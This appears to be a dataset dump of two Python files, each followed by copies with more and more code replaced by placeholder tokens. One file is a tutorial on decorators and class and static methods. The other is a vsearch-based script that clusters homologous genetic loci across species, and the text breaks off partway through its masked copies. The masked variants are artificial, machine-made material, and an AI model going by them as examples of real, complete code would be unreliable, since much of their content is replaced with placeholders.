"# Decorator\n\"\"\"\n Given spam a fn. and eggs a deco\n spam = eggs(spam)\n def eggs(function):\n return function\n @eggs\n def spam():\n pass\n\n\"\"\"\n\"\"\"\n Sample Decorator\n\n\"\"\"\n\nimport functools\n# Decorator Function\n\n\ndef print_all_input(function):\n @functools.wraps(function)\n def aeggs(*args, **kwargs):\n print (\"args are \", args)\n print ('$' * 10)\n print (\"kwargs are \", kwargs)\n\n print (\"NAME OF Function is\", function.__name__)\n\n return function(*args, **kwargs)\n return aeggs\n# Normal func\n\n\n@print_all_input\ndef spam(a, b, c):\n return a + b + c\n\nprint (spam(1, 2, 3))\n\n\"\"\"\nHow decorators used in debug\n\nimport somemodule\ndebug_this_function=debug(somemodule.somefunc)\nget debugoutput\ndebug_this_function()\n\nalso\nsomemodule.somefunc= debug_this_function\nNow when u call somemodule.somefunc u will get decorated out\n\"\"\"\n\n\ndef plus_one(function):\n @functools.wraps(function)\n def _plus_one(self, n):\n return function(self, n + 1)\n return _plus_one\n\n\nclass Spam(object):\n def __init__(self):\n pass\n\n @plus_one\n def somefunc(self, n):\n print (n)\n\nSpam().somefunc(1)\n\n\n\"\"\"\nclass method and staticmethod\nclassmethod passes object and static method skips both instance and object\n\n\n\"\"\"\nprint (\"$\" * 10)\n\n\nclass Spam(object):\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print ('args ', args)\n print ('kwargs ', kwargs)\n print ('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print ('args ', args)\n print ('kwargs ', kwargs)\n print ('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print ('args ', args)\n print ('kwargs ', kwargs)\n\n\nspam = Spam()\nspam.some_instance(1, 2, a=5, b=6)\n# Spam.some_instance() will through an error\nprint (spam.some_cls_method(1, 2, a=2, b=3))\nSpam.some_cls_method()\n\"\"\"\nargs ()\nkwargs {}\ncls <class '__main__.Spam'>\n\n\"\"\"\n\"\"\"\n Extra Arguments in decorator\n\n\n\"\"\"\nprint ('$' * 10)\n\n\ndef add(extra_n=5):\n\n def _add(function):\n @functools.wraps(function)\n def __add(n):\n print (\"hey \", extra_n, n)\n return function(n + extra_n)\n return __add\n return _add\n\n\n@add(7)\n@add(2)\ndef spam(n):\n return n\nprint (spam(5))\n",
"<docstring token>\nimport functools\n\n\ndef print_all_input(function):\n\n @functools.wraps(function)\n def aeggs(*args, **kwargs):\n print('args are ', args)\n print('$' * 10)\n print('kwargs are ', kwargs)\n print('NAME OF Function is', function.__name__)\n return function(*args, **kwargs)\n return aeggs\n\n\n@print_all_input\ndef spam(a, b, c):\n return a + b + c\n\n\nprint(spam(1, 2, 3))\n<docstring token>\n\n\ndef plus_one(function):\n\n @functools.wraps(function)\n def _plus_one(self, n):\n return function(self, n + 1)\n return _plus_one\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n @plus_one\n def somefunc(self, n):\n print(n)\n\n\nSpam().somefunc(1)\n<docstring token>\nprint('$' * 10)\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\nspam = Spam()\nspam.some_instance(1, 2, a=5, b=6)\nprint(spam.some_cls_method(1, 2, a=2, b=3))\nSpam.some_cls_method()\n<docstring token>\nprint('$' * 10)\n\n\ndef add(extra_n=5):\n\n def _add(function):\n\n @functools.wraps(function)\n def __add(n):\n print('hey ', extra_n, n)\n return function(n + extra_n)\n return __add\n return _add\n\n\n@add(7)\n@add(2)\ndef spam(n):\n return n\n\n\nprint(spam(5))\n",
"<docstring token>\n<import token>\n\n\ndef print_all_input(function):\n\n @functools.wraps(function)\n def aeggs(*args, **kwargs):\n print('args are ', args)\n print('$' * 10)\n print('kwargs are ', kwargs)\n print('NAME OF Function is', function.__name__)\n return function(*args, **kwargs)\n return aeggs\n\n\n@print_all_input\ndef spam(a, b, c):\n return a + b + c\n\n\nprint(spam(1, 2, 3))\n<docstring token>\n\n\ndef plus_one(function):\n\n @functools.wraps(function)\n def _plus_one(self, n):\n return function(self, n + 1)\n return _plus_one\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n @plus_one\n def somefunc(self, n):\n print(n)\n\n\nSpam().somefunc(1)\n<docstring token>\nprint('$' * 10)\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\nspam = Spam()\nspam.some_instance(1, 2, a=5, b=6)\nprint(spam.some_cls_method(1, 2, a=2, b=3))\nSpam.some_cls_method()\n<docstring token>\nprint('$' * 10)\n\n\ndef add(extra_n=5):\n\n def _add(function):\n\n @functools.wraps(function)\n def __add(n):\n print('hey ', extra_n, n)\n return function(n + extra_n)\n return __add\n return _add\n\n\n@add(7)\n@add(2)\ndef spam(n):\n return n\n\n\nprint(spam(5))\n",
"<docstring token>\n<import token>\n\n\ndef print_all_input(function):\n\n @functools.wraps(function)\n def aeggs(*args, **kwargs):\n print('args are ', args)\n print('$' * 10)\n print('kwargs are ', kwargs)\n print('NAME OF Function is', function.__name__)\n return function(*args, **kwargs)\n return aeggs\n\n\n@print_all_input\ndef spam(a, b, c):\n return a + b + c\n\n\nprint(spam(1, 2, 3))\n<docstring token>\n\n\ndef plus_one(function):\n\n @functools.wraps(function)\n def _plus_one(self, n):\n return function(self, n + 1)\n return _plus_one\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n @plus_one\n def somefunc(self, n):\n print(n)\n\n\nSpam().somefunc(1)\n<docstring token>\nprint('$' * 10)\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\nspam.some_instance(1, 2, a=5, b=6)\nprint(spam.some_cls_method(1, 2, a=2, b=3))\nSpam.some_cls_method()\n<docstring token>\nprint('$' * 10)\n\n\ndef add(extra_n=5):\n\n def _add(function):\n\n @functools.wraps(function)\n def __add(n):\n print('hey ', extra_n, n)\n return function(n + extra_n)\n return __add\n return _add\n\n\n@add(7)\n@add(2)\ndef spam(n):\n return n\n\n\nprint(spam(5))\n",
"<docstring token>\n<import token>\n\n\ndef print_all_input(function):\n\n @functools.wraps(function)\n def aeggs(*args, **kwargs):\n print('args are ', args)\n print('$' * 10)\n print('kwargs are ', kwargs)\n print('NAME OF Function is', function.__name__)\n return function(*args, **kwargs)\n return aeggs\n\n\n@print_all_input\ndef spam(a, b, c):\n return a + b + c\n\n\n<code token>\n<docstring token>\n\n\ndef plus_one(function):\n\n @functools.wraps(function)\n def _plus_one(self, n):\n return function(self, n + 1)\n return _plus_one\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n @plus_one\n def somefunc(self, n):\n print(n)\n\n\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n\n\ndef add(extra_n=5):\n\n def _add(function):\n\n @functools.wraps(function)\n def __add(n):\n print('hey ', extra_n, n)\n return function(n + extra_n)\n return __add\n return _add\n\n\n@add(7)\n@add(2)\ndef spam(n):\n return n\n\n\n<code token>\n",
"<docstring token>\n<import token>\n\n\ndef print_all_input(function):\n\n @functools.wraps(function)\n def aeggs(*args, **kwargs):\n print('args are ', args)\n print('$' * 10)\n print('kwargs are ', kwargs)\n print('NAME OF Function is', function.__name__)\n return function(*args, **kwargs)\n return aeggs\n\n\n<function token>\n<code token>\n<docstring token>\n\n\ndef plus_one(function):\n\n @functools.wraps(function)\n def _plus_one(self, n):\n return function(self, n + 1)\n return _plus_one\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n @plus_one\n def somefunc(self, n):\n print(n)\n\n\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n\n\ndef add(extra_n=5):\n\n def _add(function):\n\n @functools.wraps(function)\n def __add(n):\n print('hey ', extra_n, n)\n return function(n + extra_n)\n return __add\n return _add\n\n\n@add(7)\n@add(2)\ndef spam(n):\n return n\n\n\n<code token>\n",
"<docstring token>\n<import token>\n\n\ndef print_all_input(function):\n\n @functools.wraps(function)\n def aeggs(*args, **kwargs):\n print('args are ', args)\n print('$' * 10)\n print('kwargs are ', kwargs)\n print('NAME OF Function is', function.__name__)\n return function(*args, **kwargs)\n return aeggs\n\n\n<function token>\n<code token>\n<docstring token>\n<function token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n @plus_one\n def somefunc(self, n):\n print(n)\n\n\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n\n\ndef add(extra_n=5):\n\n def _add(function):\n\n @functools.wraps(function)\n def __add(n):\n print('hey ', extra_n, n)\n return function(n + extra_n)\n return __add\n return _add\n\n\n@add(7)\n@add(2)\ndef spam(n):\n return n\n\n\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<code token>\n<docstring token>\n<function token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n @plus_one\n def somefunc(self, n):\n print(n)\n\n\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n\n\ndef add(extra_n=5):\n\n def _add(function):\n\n @functools.wraps(function)\n def __add(n):\n print('hey ', extra_n, n)\n return function(n + extra_n)\n return __add\n return _add\n\n\n@add(7)\n@add(2)\ndef spam(n):\n return n\n\n\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<code token>\n<docstring token>\n<function token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n @plus_one\n def somefunc(self, n):\n print(n)\n\n\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n<function token>\n\n\n@add(7)\n@add(2)\ndef spam(n):\n return n\n\n\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<code token>\n<docstring token>\n<function token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n @plus_one\n def somefunc(self, n):\n print(n)\n\n\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<code token>\n<docstring token>\n<function token>\n\n\nclass Spam(object):\n <function token>\n\n @plus_one\n def somefunc(self, n):\n print(n)\n\n\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<code token>\n<docstring token>\n<function token>\n\n\nclass Spam(object):\n <function token>\n <function token>\n\n\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<code token>\n<docstring token>\n<function token>\n<class token>\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<code token>\n<docstring token>\n<function token>\n<class token>\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n <function token>\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<code token>\n<docstring token>\n<function token>\n<class token>\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n <function token>\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n <function token>\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<code token>\n<docstring token>\n<function token>\n<class token>\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n <function token>\n <function token>\n <function token>\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<code token>\n<docstring token>\n<function token>\n<class token>\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<code token>\n<docstring token>\n<function token>\n<class token>\n<code token>\n<docstring token>\n<code token>\n<class token>\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n<function token>\n<function token>\n<code token>\n"
] | false |
99,885 | 849689552319b1fa2e1fc9d68036d4d59e377876 | import re
import subprocess
import os
import argparse
import random
import string
import sys
import pandas as pd
parser = argparse.ArgumentParser(description="Define homologous loci across species.")
parser.add_argument('--dir', help="Directory for which to run.")
parser.add_argument('--genus', help="Genus for which to run.")
args = parser.parse_args()
dir = args.dir
genus = args.genus
c_file = '/Volumes/heloderma4/sonal/eco_IBD_oz/data/clustering/Ctenotus_Lerista.clustering.revised.csv'
d = pd.read_csv(c_file)
d = d[d.GMYC_RAxML2.notnull()]
clusters = d[d.GMYC_RAxML2.str.contains(genus)].GMYC_RAxML2.unique()
files = ['%s%s.fa' % (dir, cl) for cl in clusters]
WCLUST = 0.8
def create_starter(dir, file, genus, ix):
homhash = {}
starting = '%s%s.tmp.fa' % (dir, genus)
f = open(file, 'r')
o = open(starting, 'w')
for l in f:
if re.search('>', l):
id = re.search('>(\S+)', l).group(1)
newid = '%s_%s' % (genus, ix)
homhash[newid] = {}
homhash[newid][id] = '+'
seq = f.next().rstrip()
o.write('>%s\n%s\n' % (newid, seq))
ix += 1
f.close()
o.close()
return starting, homhash, ix
def vsearch(dir, tmpfile, file, genus, num):
out = '%s%s_%s_search' % (dir, genus, num)
subprocess.call("vsearch --usearch_global %s --db %s --userout %s --id %s --userfields query+target+evalue+id+qstrand --strand both --threads 4" % (file, tmpfile, out, WCLUST), shell=True)
return out
def create_new_tmp(dir, tmpfile, file, results, homhash, genus, ix):
matches1 = {}
matches2 = {}
f = open(results, 'r')
for l in f:
d = re.split('\s+', l.rstrip())
# is this step necessary?
# makes sure it is 1 to 1
if d[1] not in matches1 and d[0] not in matches2:
matches1[d[1]] = {'match': d[0], 'perc': float(d[3]), 'strand': d[4]}
matches2[d[0]] = {'match': d[1], 'perc': float(d[3]), 'strand': d[4]}
elif d[0] in matches2 and d[1] not in matches1:
if float(d[3]) > matches2[d[0]]['perc']:
matches1[d[1]] = {'match': d[0], 'perc': float(d[3]), 'strand': d[4]}
matches2[d[0]] = {'match': d[1], 'perc': float(d[3]), 'strand': d[4]}
f.close()
os.remove(results)
for c in matches2:
homhash[matches2[c]['match']][c] = matches2[c]['strand']
f = open(file, 'r')
o = open(tmpfile, 'a')
for l in f:
if re.search('>', l):
id = re.search('>(\S+)', l.rstrip()).group(1)
seq = f.next().rstrip()
if id not in matches2:
new_id = '%s_%s' % (genus, ix)
ix += 1
homhash[new_id] = {}
homhash[new_id][id] = '+'
o.write('>%s\n%s\n' % (new_id, seq))
f.close()
o.close()
return (tmpfile, homhash, ix)
ix = 0
tmpfile, homhash, ix = create_starter(dir, files[0], genus, ix)
for num, file in enumerate(files[1:]):
results = vsearch(dir, tmpfile, file, genus, num)
(tmpfile, homhash, ix) = create_new_tmp(dir, tmpfile, file, results, homhash, genus, ix)
os.remove(tmpfile)
o = open('%s%s_homology_across_species.txt' % (dir, genus), 'w')
o.write('contig\tmatches\tnumMatches\n')
for c, matches in homhash.items():
matches = ['%s:%s' % (match, homhash[c][match]) for match in matches]
o.write('%s\t%s\t%s\n' % (c, ','.join(matches), len(matches)))
o.close()
| [
"import re\nimport subprocess\nimport os\nimport argparse\nimport random\nimport string\nimport sys\nimport pandas as pd\n\nparser = argparse.ArgumentParser(description=\"Define homologous loci across species.\")\nparser.add_argument('--dir', help=\"Directory for which to run.\")\nparser.add_argument('--genus', help=\"Genus for which to run.\")\n\nargs = parser.parse_args()\ndir = args.dir\ngenus = args.genus\n\nc_file = '/Volumes/heloderma4/sonal/eco_IBD_oz/data/clustering/Ctenotus_Lerista.clustering.revised.csv'\nd = pd.read_csv(c_file)\nd = d[d.GMYC_RAxML2.notnull()]\nclusters = d[d.GMYC_RAxML2.str.contains(genus)].GMYC_RAxML2.unique()\n\nfiles = ['%s%s.fa' % (dir, cl) for cl in clusters]\nWCLUST = 0.8\n\ndef create_starter(dir, file, genus, ix):\n\thomhash = {}\n\n\tstarting = '%s%s.tmp.fa' % (dir, genus)\n\tf = open(file, 'r')\n\to = open(starting, 'w')\n\tfor l in f:\n\t\tif re.search('>', l):\n\t\t\tid = re.search('>(\\S+)', l).group(1)\n\t\t\tnewid = '%s_%s' % (genus, ix)\n\n\t\t\thomhash[newid] = {}\n\t\t\thomhash[newid][id] = '+'\n\t\t\t\n\t\t\tseq = f.next().rstrip()\n\t\t\to.write('>%s\\n%s\\n' % (newid, seq))\n\t\t\tix += 1\n\tf.close()\n\to.close()\n\n\treturn starting, homhash, ix\n\n\ndef vsearch(dir, tmpfile, file, genus, num):\n\tout = '%s%s_%s_search' % (dir, genus, num)\n\tsubprocess.call(\"vsearch --usearch_global %s --db %s --userout %s --id %s --userfields query+target+evalue+id+qstrand --strand both --threads 4\" % (file, tmpfile, out, WCLUST), shell=True)\n\n\treturn out\n\n\ndef create_new_tmp(dir, tmpfile, file, results, homhash, genus, ix):\n\tmatches1 = {}\n\tmatches2 = {}\n\n\tf = open(results, 'r')\n\tfor l in f:\n\t\td = re.split('\\s+', l.rstrip())\n\t\t# is this step necessary?\n\t\t# makes sure it is 1 to 1\n\t\tif d[1] not in matches1 and d[0] not in matches2:\n\t\t\tmatches1[d[1]] = {'match': d[0], 'perc': float(d[3]), 'strand': d[4]}\n\t\t\tmatches2[d[0]] = {'match': d[1], 'perc': float(d[3]), 'strand': d[4]}\n\t\telif d[0] in matches2 and d[1] not in matches1:\n\t\t\tif float(d[3]) > matches2[d[0]]['perc']:\n \tmatches1[d[1]] = {'match': d[0], 'perc': float(d[3]), 'strand': d[4]}\n \tmatches2[d[0]] = {'match': d[1], 'perc': float(d[3]), 'strand': d[4]}\n\tf.close()\n\tos.remove(results)\n\n\tfor c in matches2:\n\t\thomhash[matches2[c]['match']][c] = matches2[c]['strand']\n\n\tf = open(file, 'r')\n\to = open(tmpfile, 'a')\n\tfor l in f:\n\t\tif re.search('>', l):\n\t\t\tid = re.search('>(\\S+)', l.rstrip()).group(1)\n\t\t\tseq = f.next().rstrip()\n\t\t\tif id not in matches2:\n\t\t\t\tnew_id = '%s_%s' % (genus, ix)\n\t\t\t\tix += 1\n\n\t\t\t\thomhash[new_id] = {}\t\n\t\t\t\thomhash[new_id][id] = '+'\n\t\t\n\t\t\t\to.write('>%s\\n%s\\n' % (new_id, seq))\n\tf.close()\n\to.close()\n\n\treturn (tmpfile, homhash, ix)\n\nix = 0\ntmpfile, homhash, ix = create_starter(dir, files[0], genus, ix)\nfor num, file in enumerate(files[1:]):\n\tresults = vsearch(dir, tmpfile, file, genus, num)\n\t(tmpfile, homhash, ix) = create_new_tmp(dir, tmpfile, file, results, homhash, genus, ix)\nos.remove(tmpfile)\n\no = open('%s%s_homology_across_species.txt' % (dir, genus), 'w')\no.write('contig\\tmatches\\tnumMatches\\n')\nfor c, matches in homhash.items():\n\tmatches = ['%s:%s' % (match, homhash[c][match]) for match in matches]\n\to.write('%s\\t%s\\t%s\\n' % (c, ','.join(matches), len(matches)))\no.close()\n\n\n",
"import re\nimport subprocess\nimport os\nimport argparse\nimport random\nimport string\nimport sys\nimport pandas as pd\nparser = argparse.ArgumentParser(description=\n 'Define homologous loci across species.')\nparser.add_argument('--dir', help='Directory for which to run.')\nparser.add_argument('--genus', help='Genus for which to run.')\nargs = parser.parse_args()\ndir = args.dir\ngenus = args.genus\nc_file = (\n '/Volumes/heloderma4/sonal/eco_IBD_oz/data/clustering/Ctenotus_Lerista.clustering.revised.csv'\n )\nd = pd.read_csv(c_file)\nd = d[d.GMYC_RAxML2.notnull()]\nclusters = d[d.GMYC_RAxML2.str.contains(genus)].GMYC_RAxML2.unique()\nfiles = [('%s%s.fa' % (dir, cl)) for cl in clusters]\nWCLUST = 0.8\n\n\ndef create_starter(dir, file, genus, ix):\n homhash = {}\n starting = '%s%s.tmp.fa' % (dir, genus)\n f = open(file, 'r')\n o = open(starting, 'w')\n for l in f:\n if re.search('>', l):\n id = re.search('>(\\\\S+)', l).group(1)\n newid = '%s_%s' % (genus, ix)\n homhash[newid] = {}\n homhash[newid][id] = '+'\n seq = f.next().rstrip()\n o.write('>%s\\n%s\\n' % (newid, seq))\n ix += 1\n f.close()\n o.close()\n return starting, homhash, ix\n\n\ndef vsearch(dir, tmpfile, file, genus, num):\n out = '%s%s_%s_search' % (dir, genus, num)\n subprocess.call(\n 'vsearch --usearch_global %s --db %s --userout %s --id %s --userfields query+target+evalue+id+qstrand --strand both --threads 4'\n % (file, tmpfile, out, WCLUST), shell=True)\n return out\n\n\ndef create_new_tmp(dir, tmpfile, file, results, homhash, genus, ix):\n matches1 = {}\n matches2 = {}\n f = open(results, 'r')\n for l in f:\n d = re.split('\\\\s+', l.rstrip())\n if d[1] not in matches1 and d[0] not in matches2:\n matches1[d[1]] = {'match': d[0], 'perc': float(d[3]), 'strand':\n d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]), 'strand':\n d[4]}\n elif d[0] in matches2 and d[1] not in matches1:\n if float(d[3]) > matches2[d[0]]['perc']:\n matches1[d[1]] = {'match': d[0], 'perc': float(d[3]),\n 'strand': d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]),\n 'strand': d[4]}\n f.close()\n os.remove(results)\n for c in matches2:\n homhash[matches2[c]['match']][c] = matches2[c]['strand']\n f = open(file, 'r')\n o = open(tmpfile, 'a')\n for l in f:\n if re.search('>', l):\n id = re.search('>(\\\\S+)', l.rstrip()).group(1)\n seq = f.next().rstrip()\n if id not in matches2:\n new_id = '%s_%s' % (genus, ix)\n ix += 1\n homhash[new_id] = {}\n homhash[new_id][id] = '+'\n o.write('>%s\\n%s\\n' % (new_id, seq))\n f.close()\n o.close()\n return tmpfile, homhash, ix\n\n\nix = 0\ntmpfile, homhash, ix = create_starter(dir, files[0], genus, ix)\nfor num, file in enumerate(files[1:]):\n results = vsearch(dir, tmpfile, file, genus, num)\n tmpfile, homhash, ix = create_new_tmp(dir, tmpfile, file, results,\n homhash, genus, ix)\nos.remove(tmpfile)\no = open('%s%s_homology_across_species.txt' % (dir, genus), 'w')\no.write('contig\\tmatches\\tnumMatches\\n')\nfor c, matches in homhash.items():\n matches = [('%s:%s' % (match, homhash[c][match])) for match in matches]\n o.write('%s\\t%s\\t%s\\n' % (c, ','.join(matches), len(matches)))\no.close()\n",
"<import token>\nparser = argparse.ArgumentParser(description=\n 'Define homologous loci across species.')\nparser.add_argument('--dir', help='Directory for which to run.')\nparser.add_argument('--genus', help='Genus for which to run.')\nargs = parser.parse_args()\ndir = args.dir\ngenus = args.genus\nc_file = (\n '/Volumes/heloderma4/sonal/eco_IBD_oz/data/clustering/Ctenotus_Lerista.clustering.revised.csv'\n )\nd = pd.read_csv(c_file)\nd = d[d.GMYC_RAxML2.notnull()]\nclusters = d[d.GMYC_RAxML2.str.contains(genus)].GMYC_RAxML2.unique()\nfiles = [('%s%s.fa' % (dir, cl)) for cl in clusters]\nWCLUST = 0.8\n\n\ndef create_starter(dir, file, genus, ix):\n homhash = {}\n starting = '%s%s.tmp.fa' % (dir, genus)\n f = open(file, 'r')\n o = open(starting, 'w')\n for l in f:\n if re.search('>', l):\n id = re.search('>(\\\\S+)', l).group(1)\n newid = '%s_%s' % (genus, ix)\n homhash[newid] = {}\n homhash[newid][id] = '+'\n seq = f.next().rstrip()\n o.write('>%s\\n%s\\n' % (newid, seq))\n ix += 1\n f.close()\n o.close()\n return starting, homhash, ix\n\n\ndef vsearch(dir, tmpfile, file, genus, num):\n out = '%s%s_%s_search' % (dir, genus, num)\n subprocess.call(\n 'vsearch --usearch_global %s --db %s --userout %s --id %s --userfields query+target+evalue+id+qstrand --strand both --threads 4'\n % (file, tmpfile, out, WCLUST), shell=True)\n return out\n\n\ndef create_new_tmp(dir, tmpfile, file, results, homhash, genus, ix):\n matches1 = {}\n matches2 = {}\n f = open(results, 'r')\n for l in f:\n d = re.split('\\\\s+', l.rstrip())\n if d[1] not in matches1 and d[0] not in matches2:\n matches1[d[1]] = {'match': d[0], 'perc': float(d[3]), 'strand':\n d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]), 'strand':\n d[4]}\n elif d[0] in matches2 and d[1] not in matches1:\n if float(d[3]) > matches2[d[0]]['perc']:\n matches1[d[1]] = 